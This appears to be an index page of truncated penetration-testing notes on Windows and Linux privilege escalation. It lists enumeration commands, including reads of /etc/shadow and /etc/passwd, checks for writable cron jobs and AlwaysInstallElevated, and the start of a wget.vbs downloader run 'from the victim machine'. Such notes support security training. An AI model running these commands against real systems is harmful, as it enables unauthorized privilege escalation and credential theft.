A common way to elevate privileges on a Windows system is to exploit insecure file permissions on services that run as nt authority\system. For example, consider a scenario in which a software dev...

Scenario: CVE-2017-1000112 Kernel exploits are an excellent way to escalate privileges, but success may depend on matching not only the target’s kernel version but also the operating system flavor...

Users User Privileges whoami /priv whoami /groups Network Privileges net user net group `domain` net localgroup `local` net localgroup <Group Name> net accounts `domain` net accounts /domain...

First, on Windows systems, we should check the status of the \_AlwaysInstallElevated registry setting. If this key is enabled (set to 1) in either HKEY_CURRENT_USER or HKEY_LOCAL_MACHINE, any user ...

Enumerating Installed Applications and Patch Levels wmic product get name, version, vendor List system-wide updates with Win32_QuickFixEngineering (qfe) wmic qfe get Caption, Description, HotFixI...

Distribution ls /etc/*-release cat /etc/os-release cat /etc/issue uname -a cat /proc/version Interesting files cat /etc/passwd cat /etc/group cat /etc/shadow cat /etc/hosts ls -lh /var/mail/ ls -...

List Cron Jobs cat /etc/crontab && ls -al /etc/cron* Find World-Writable Cron jobs find /etc/cron* -type f -perm -o+w -exec ls -l {} \; Find Cron Jobs Owned by Other Users find /etc/cro...

Upload To upload a file you need to go to the folder where the file is and ONLY use the file name otherwise you’ll receive a 500 error: passive # must be off binary # to upload binaries, execute th...

Writable and executable file In order to leverage insecure file permissions, we must locate an executable file that not only allows us write access but also runs at an elevated privilege level. Use...

From the victim machine command shell use this list of commands: echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQ...